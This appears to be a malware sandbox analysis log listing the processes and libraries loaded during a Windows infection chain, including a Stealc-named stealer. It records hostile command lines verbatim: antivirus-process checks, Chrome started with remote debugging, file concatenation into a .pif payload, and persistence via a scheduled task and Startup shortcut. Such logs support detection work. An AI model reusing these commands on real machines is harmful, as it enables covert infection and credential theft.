Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user~1\AppData\Local\Temp\1000066001\stealc_default2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe "C:\Users\user~1\AppData\Local\Temp\1000477001\Offnewhere.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe "C:\Users\user~1\AppData\Local\Temp\1000817001\splwow64.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe "C:\Users\user~1\AppData\Local\Temp\1000828001\new_v8.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe "C:\Users\user~1\AppData\Local\Temp\1000833001\f55899dae2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe "C:\Users\user~1\AppData\Local\Temp\1000857001\550b7cfe5f.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user~1\AppData\Local\Temp\1000965001\GOLD1234.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe "C:\Users\user~1\AppData\Local\Temp\1001096001\RDX123456.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 197036
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jurisdiction.pif T
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: aphostservice.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: networkhelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userdataplatformhelperutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mccspal.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: syncutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: syncutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dmcfgutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dmcmnutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dmxmlhelputils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: inproclogger.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.networking.connectivity.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: synccontroller.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pimstore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: aphostclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: accountaccessor.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: systemeventsbrokerclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userdatalanguageutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mccsengineshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cemapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userdatatypehelperutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: phoneutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: storsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fltlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bcd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: storageusage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: w32time.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vmictimeprovider.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanagersvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: clipc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wscapi.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: slc.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: pnrpnsp.dll
